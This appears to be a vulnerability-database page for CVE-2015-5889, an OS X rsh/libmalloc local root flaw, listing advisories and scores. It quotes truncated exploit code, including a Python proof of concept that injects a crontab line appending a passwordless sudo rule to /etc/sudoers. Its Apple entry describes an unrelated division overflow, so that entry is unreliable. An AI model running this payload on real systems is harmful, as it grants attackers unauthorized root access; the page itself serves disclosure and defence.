CVE-2015-5889
published 2015-10-09CVE-2015-5889: rsh in the remote_cmds component in Apple OS X before 10.11 allows local users to obtain root privileges via vectors involving environment variables.
PriorityP336high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
5.09%
91.3th percentile
rsh in the remote_cmds component in Apple OS X before 10.11 allows local users to obtain root privileges via vectors involving environment variables.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | <= 10.10.5 | — |
| apple | os_x_el_capitan_v10.11 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7m5g-q9fx-rh4c: rsh in the remote_cmds component in Apple OS X before 10
ghsa_unreviewed·2022-05-17
CVE-2015-5889 [HIGH] GHSA-7m5g-q9fx-rh4c: rsh in the remote_cmds component in Apple OS X before 10
rsh in the remote_cmds component in Apple OS X before 10.11 allows local users to obtain root privileges via vectors involving environment variables.
Apple
CVE-2015-5889: OS X El Capitan v10.11
vendor_apple·CVSS 7.2
CVE-2015-5889 [HIGH] CVE-2015-5889: OS X El Capitan v10.11
Apple Security Update: About the security content of OS X El Capitan v10.11
Product: OS X El Capitan v10.11
CVE: CVE-2015-5889
Component: CVE-ID
Impact: Processing malicious data may lead to unexpected application termination
Description: An overflow fault existed in the checkint division routines. This issue was addressed with improved division routines.
No detection rules found.
Exploit-DB
Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation (Metasploit)
exploitdb·2015-10-27
CVE-2015-5889 Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation (Metasploit)
Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
'Description' => %q{
This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
Makes sudo require no password, giving access to su even if root is disabled.
Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
},
'Author' => [
'rebel', # Vulnerability discovery and PoC
'shandelman116' # Copy/paste AND translator monkey
],
'References' => [
['EDB', '38371'],
['CVE', '2015-5889']
],
'DisclosureDate' => 'Oct 1 2015',
'Licens
Exploit-DB
Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation
exploitdb·2015-10-01·CVSS 7.2
CVE-2015-5889 [HIGH] Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation
Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation
---
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
sys.stderr.write("creating /etc/crontab..")
p = os.fork()
if p == 0:
os.close(1)
os.close(2)
os.execve("/usr/bin/rsh",["rsh","localhost"],env)
time.sleep(1)
if "NOPASSWD" not in open("/etc/crontab").read():
sys.stderr.write("failed\n")
sys.exit(-1)
sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
while os.stat
Metasploit
Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
metasploit
Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
This module writes to the sudoers file without root access by exploiting rsh and malloc log files. Makes sudo require no password, giving access to su even if root is disabled. Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2015/Sep/msg00008.htmlhttp://packetstormsecurity.com/files/133826/issetugid-rsh-libmalloc-OS-X-Local-Root.htmlhttp://packetstormsecurity.com/files/134087/Mac-OS-X-10.9.5-10.10.5-rsh-libmalloc-Privilege-Escalation.htmlhttp://seclists.org/fulldisclosure/2015/Oct/5http://www.rapid7.com/db/modules/exploit/osx/local/rsh_libmallochttp://www.securityfocus.com/bid/76908http://www.securitytracker.com/id/1033703https://support.apple.com/HT205267https://www.exploit-db.com/exploits/38371/https://www.exploit-db.com/exploits/38540/http://lists.apple.com/archives/security-announce/2015/Sep/msg00008.htmlhttp://packetstormsecurity.com/files/133826/issetugid-rsh-libmalloc-OS-X-Local-Root.htmlhttp://packetstormsecurity.com/files/134087/Mac-OS-X-10.9.5-10.10.5-rsh-libmalloc-Privilege-Escalation.htmlhttp://seclists.org/fulldisclosure/2015/Oct/5http://www.rapid7.com/db/modules/exploit/osx/local/rsh_libmallochttp://www.securityfocus.com/bid/76908http://www.securitytracker.com/id/1033703https://support.apple.com/HT205267https://www.exploit-db.com/exploits/38371/https://www.exploit-db.com/exploits/38540/
2015-10-09
Published